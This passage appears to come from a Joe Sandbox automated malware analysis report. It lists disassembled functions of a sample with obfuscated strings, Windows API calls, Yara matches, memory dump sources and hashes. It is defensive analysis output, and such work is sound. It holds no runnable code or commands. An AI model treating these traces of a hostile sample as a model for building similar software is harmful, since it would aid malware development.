                                                                                                                                                                                                                                                          • Instruction ID: 6951834232966a2342cda561313f373f27e489b71b577a9f1bbade8454517541
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db3bbc2852807f260050379881b4d3eba7f21407b1fc4a639028f95d2bc8165e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDF18131D087E98ADB36C63C8C543DDAEA15B66324F0843E9C4AD6B3D2C7B54A85CB52
                                                                                                                                                                                                                                                          Function 0043506D Relevance: 39.1, Strings: 31, Instructions: 329COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $$0$1$4$<$>$M$Q$R$S$U$a$b$c$c$e$g$g$i$k$m$n$o$q$s$u$w$y${$}$~
                                                                                                                                                                                                                                                          • API String ID: 0-379513683
                                                                                                                                                                                                                                                          • Opcode ID: cfa054dc800593ef20723bf0e07abeb3e5f3e33d89c21528bf78c2c7209d6cbb
                                                                                                                                                                                                                                                          • Instruction ID: fbc6194e022bf2d7584349dbc9d518ea0f683462fe8accb2f8c95ac37d1c220e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa054dc800593ef20723bf0e07abeb3e5f3e33d89c21528bf78c2c7209d6cbb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF1D2319087E98ADB36C63C8C543DDBEA25B56324F0843E9C4ED6B3D2C6B50BC58B56
                                                                                                                                                                                                                                                          Function 024A7E27 Relevance: 30.4, APIs: 8, Strings: 9, Instructions: 639memorycomCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 024A8049
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 024A80AE
                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(680742DE,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024A80F7
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 024A814F
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(F9BDF745), ref: 024A8227
                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 024A8299
                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 024A841F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocString$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                          • String ID: Z>\$/^&P$/^&PZ>\$0R/T$C$Gx$Ljkl$ab$pyz{
                                                                                                                                                                                                                                                          • API String ID: 305737880-109390196
                                                                                                                                                                                                                                                          • Opcode ID: f5650649af3bb8683cce130507ff282943505e9f99ba66872af77d97622111cc
                                                                                                                                                                                                                                                          • Instruction ID: d219e338c2c54160316490cec37c8b2350c52324b68cfd502d67b8f5149e4bd4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5650649af3bb8683cce130507ff282943505e9f99ba66872af77d97622111cc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB12EE72A083509FD320CF68C894B5BBBE1EFD5714F194A2DEAE49B390D774D8058B82
                                                                                                                                                                                                                                                          Function 024888A1 Relevance: 24.0, Strings: 19, Instructions: 222COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: V%h$$rt$*^,P$+N;@$:J4L$<F9X$=Z$\$G6HH$H2P4$L.[ $Q>b0$V*H,$X"\$$[&'8$g"w$$k:~<$l*G,$r&f8$~.p
                                                                                                                                                                                                                                                          • API String ID: 0-2572281532
                                                                                                                                                                                                                                                          • Opcode ID: f2b735d5565443e60b290a4db958f3dd542149773ac8ca26e3220f171de3171a
                                                                                                                                                                                                                                                          • Instruction ID: 90569e0cdcbd1feedc69857b1e463444e89737a1b4f21c7a31be227e82eadc65
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2b735d5565443e60b290a4db958f3dd542149773ac8ca26e3220f171de3171a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C781ABB29193D18BC33A8F15C8853DFBBE2FBC0304F598A2DC8998B254DB754606CB46
                                                                                                                                                                                                                                                          Function 00418638 Relevance: 24.0, Strings: 19, Instructions: 221COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: V%h$$rt$*^,P$+N;@$:J4L$<F9X$=Z$\$G6HH$H2P4$L.[ $Q>b0$V*H,$X"\$$[&'8$g"w$$k:~<$l*G,$r&f8$~.p
                                                                                                                                                                                                                                                          • API String ID: 0-2572281532
                                                                                                                                                                                                                                                          • Opcode ID: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
                                                                                                                                                                                                                                                          • Instruction ID: fc9c91e7f1a30bb03526ffdc58390b239219c7e1b2437cd68821ef081b52b0d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B581BEB29193918BC33A8F15C8853DFBBE2FBC0304F59892DC4999B354DB754602CB4A
                                                                                                                                                                                                                                                          Function 02494D07 Relevance: 21.7, Strings: 17, Instructions: 445COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
                                                                                                                                                                                                                                                          • API String ID: 0-416511104
                                                                                                                                                                                                                                                          • Opcode ID: adba4028a27d79ef5c5b54763bf1222529bcdb3dd089f517822c49e845e26f1c
                                                                                                                                                                                                                                                          • Instruction ID: daa9f333963be5f1a23f679923f30bb54875b00dd6237d57aa334e075f8ce29e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adba4028a27d79ef5c5b54763bf1222529bcdb3dd089f517822c49e845e26f1c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6421AB560C3948AD334CF55D442BCFBAF2FB92304F00882DC5D9AB615DBB54A468B97
                                                                                                                                                                                                                                                          Function 00424AA8 Relevance: 21.7, Strings: 17, Instructions: 444COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
                                                                                                                                                                                                                                                          • API String ID: 0-416511104
                                                                                                                                                                                                                                                          • Opcode ID: 1d615baf16a5cb2da3b9dcf4c28b1abc6d5fa3844a44abe495e2c78bf808da89
                                                                                                                                                                                                                                                          • Instruction ID: 3a13b98e1fcd4ee340008fd0ff9d0d16dd32adc4ff5d5dd5518182cac15cbb42
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d615baf16a5cb2da3b9dcf4c28b1abc6d5fa3844a44abe495e2c78bf808da89
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E420AB560C3948AD334CF55D442BCFBAF2FB92304F00882DC5D9AB615DBB54A468B9B
                                                                                                                                                                                                                                                          Function 00425691 Relevance: 21.7, Strings: 17, Instructions: 435COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
                                                                                                                                                                                                                                                          • API String ID: 0-416511104
                                                                                                                                                                                                                                                          • Opcode ID: 7025e020dc1be4b8a9aa057e7f4e20e478a06c8b1f4e692c69e1f3649ff6bb3a
                                                                                                                                                                                                                                                          • Instruction ID: ca3b89ee566e4ff942ad83ab59672ef17daa3edc381adbb1ac583b775d9a42f8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7025e020dc1be4b8a9aa057e7f4e20e478a06c8b1f4e692c69e1f3649ff6bb3a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A421CB520C3D48AC334CF54D442B9FBAF2FB92304F40882DC5D96B615DBB54A468B9B
                                                                                                                                                                                                                                                          Function 0248085A Relevance: 15.8, Strings: 12, Instructions: 815COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $$($($-$A$G$I$N$X$l$n${
                                                                                                                                                                                                                                                          • API String ID: 0-3018408179
                                                                                                                                                                                                                                                          • Opcode ID: 20fecec664957fa8e958fc0b48a3ebd2b86fe6cf7a51e2b9ced4b28621d421dc
                                                                                                                                                                                                                                                          • Instruction ID: bbd45a93734510f6f55408802771ea4a9b2b9fac0c8705e7f4131534d378fdb7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20fecec664957fa8e958fc0b48a3ebd2b86fe6cf7a51e2b9ced4b28621d421dc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1462B67261D7908BD324AF39C4853AEBBD2ABC5314F098A2FD9DDD7381D6748846CB42
                                                                                                                                                                                                                                                          Function 004105F3 Relevance: 15.8, Strings: 12, Instructions: 815COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $$($($-$A$G$I$N$X$l$n${
                                                                                                                                                                                                                                                          • API String ID: 0-3018408179
                                                                                                                                                                                                                                                          • Opcode ID: 5e103353c0778339808f6a7ca294803b546d41d14dbeded6291cd10cad3a3d9b
                                                                                                                                                                                                                                                          • Instruction ID: 45de6dd5686d3479f9f5989f6b87c12e9a5a75427f0c78b35cf7a0a625548742
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e103353c0778339808f6a7ca294803b546d41d14dbeded6291cd10cad3a3d9b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4462D372A0D7908BC3249B3984853DFBBD2ABC5314F198A3ED9D9D73C1D67889818B47
                                                                                                                                                                                                                                                          Function 02491CE7 Relevance: 14.3, Strings: 11, Instructions: 597COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: !@$,$/$5$6$B$D$k$m$n$o
                                                                                                                                                                                                                                                          • API String ID: 0-3097700080
                                                                                                                                                                                                                                                          • Opcode ID: d14db685c42de0870d4f3f3b634c5b5a98c477aac6c67201ae2a51db1abd5241
                                                                                                                                                                                                                                                          • Instruction ID: 91d85d061528e392b4294810f582a08e6967e16242f3653723ff81bca0384212
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d14db685c42de0870d4f3f3b634c5b5a98c477aac6c67201ae2a51db1abd5241
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F32B37160C7919BD724CB28C49136FBFE2ABC9314F08892EE9DA87391D7B58845CB43
                                                                                                                                                                                                                                                          Function 00421A80 Relevance: 14.3, Strings: 11, Instructions: 597COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: !@$,$/$5$6$B$D$k$m$n$o
                                                                                                                                                                                                                                                          • API String ID: 0-3097700080
                                                                                                                                                                                                                                                          • Opcode ID: 359b3e2d534d2da6293d800b8eafe1b1fd86d14f64275b3f19adbfaf5cb2e09e
                                                                                                                                                                                                                                                          • Instruction ID: dc28331636f64223628dcf67653152bfe71e102bd96d9b605168d7f034e00d79
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 359b3e2d534d2da6293d800b8eafe1b1fd86d14f64275b3f19adbfaf5cb2e09e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD32F17170C7908FD3248B28D49136FBBE1ABD9314F58892EE5D6873D2D6BD8841874B
                                                                                                                                                                                                                                                          Function 024A73E7 Relevance: 12.8, Strings: 10, Instructions: 290COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $%$)$.$?$C$K$Y$v$v
                                                                                                                                                                                                                                                          • API String ID: 0-1948704018
                                                                                                                                                                                                                                                          • Opcode ID: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
                                                                                                                                                                                                                                                          • Instruction ID: 7107083b5fb1b287b1bd19d204c4d6d0cdc1f4f1bfb69b5c4f3d31a520786e0f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4A13723A0CBE14AD321957D8C9425FEEC30BE6124F1ECB6ED8E5873D6D569C8068393
                                                                                                                                                                                                                                                          Function 00437180 Relevance: 12.8, Strings: 10, Instructions: 290COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $%$)$.$?$C$K$Y$v$v
                                                                                                                                                                                                                                                          • API String ID: 0-1948704018
                                                                                                                                                                                                                                                          • Opcode ID: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
                                                                                                                                                                                                                                                          • Instruction ID: f70cb8b5534ef894ef439ad6c336ad61d0d4793a511eb9a38b6a33aaea9181ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f716606c8118ff5923e3058c5eb05300d8b4fc38a581191a17a7c380467e32a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15A14D23A0C7D14AD321857D4C8425BEEC30BEA224F1ECB6ED8E5973C6D579C9069393
                                                                                                                                                                                                                                                          Function 0041A150 Relevance: 12.1, APIs: 2, Strings: 4, Instructions: 1622COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 0043C330: LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A7FA
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0041A89B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                          • String ID: AB$I,~M$Wu$N@
                                                                                                                                                                                                                                                          • API String ID: 764372645-3264195455
                                                                                                                                                                                                                                                          • Opcode ID: 3c9db392397c6fdfae386d33a71b3b493e00643e59cb143520e15f2248edb9ae
                                                                                                                                                                                                                                                          • Instruction ID: e1ca4a59bde15fa5924e3eed146bb9730fe9803e238724338574477127e3de75
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9db392397c6fdfae386d33a71b3b493e00643e59cb143520e15f2248edb9ae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACA255352493009FD724DB24C881BABBBE3EBC5314F19C82EE5D587352D779D8868B86
                                                                                                                                                                                                                                                          Function 0248A3B7 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1622COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: AB$I,~M$N@
                                                                                                                                                                                                                                                          • API String ID: 3664257935-1338355008
                                                                                                                                                                                                                                                          • Opcode ID: 401f91f6926f723cc129c0a677715be08141d873c4625b0886a64bef750105ec
                                                                                                                                                                                                                                                          • Instruction ID: 196766abd8ce6fbe61f063082385e33dbd078fe73b8bf47651333deb28123581
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 401f91f6926f723cc129c0a677715be08141d873c4625b0886a64bef750105ec
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6A222366583108FD724EB24C891B6FBBE3EBC5318F19882EE5D587352D7B5D8428B42
                                                                                                                                                                                                                                                          Function 00423A2A Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 400COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: AF$EG$IK$stu
                                                                                                                                                                                                                                                          • API String ID: 0-1635301703
                                                                                                                                                                                                                                                          • Opcode ID: dc9b4c5ece35ad8c862ce3070bcb84a3f81ec2f455f2b909a682d3389be57742
                                                                                                                                                                                                                                                          • Instruction ID: 39eb04832eb88fb9aa3c4d3716742c09fe3224a1bca5495eee59028efd12266c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc9b4c5ece35ad8c862ce3070bcb84a3f81ec2f455f2b909a682d3389be57742
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75D168B5E00211DFDB10CF64D882A6BBB71FF46315F1581A9E941AF352E738A901CF99
                                                                                                                                                                                                                                                          Function 00422F0D Relevance: 8.1, Strings: 6, Instructions: 628COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: '#%;$.1&*$066&$0~#/$_F$3B
                                                                                                                                                                                                                                                          • API String ID: 0-1609436745
                                                                                                                                                                                                                                                          • Opcode ID: d22eb257bb4fed3426fd1d2177278c913c958326b031723211245003450e7289
                                                                                                                                                                                                                                                          • Instruction ID: 7ea3dd8e245a26d41854b7de1f2706448979532b446e58bce8047c1e76753e38
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d22eb257bb4fed3426fd1d2177278c913c958326b031723211245003450e7289
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6120D75608211DFE714CF28E89172BB7E2FB8A315F59893CE88297291D738ED11CB46
                                                                                                                                                                                                                                                          Function 02478837 Relevance: 7.7, APIs: 5, Instructions: 170threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0247885B
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02478865
                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0247897A
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0247898F
                                                                                                                                                                                                                                                            • Part of subcall function 0247B627: FreeLibrary.KERNEL32(02478A45), ref: 0247B62D
                                                                                                                                                                                                                                                            • Part of subcall function 0247B627: FreeLibrary.KERNEL32 ref: 0247B64E
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02478A4C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3676751680-0
                                                                                                                                                                                                                                                          • Opcode ID: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                                                                                                                                                                                          • Instruction ID: 21d54e58dd403255736acb78663528af83a7726465bdd7319e8330c0acff1f49
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8514777F543180BC318AEFD8D8636AFAC65BC4610F0E813E9D99DB390E9B89C4546C4
                                                                                                                                                                                                                                                          Function 0042DB7F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 498COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
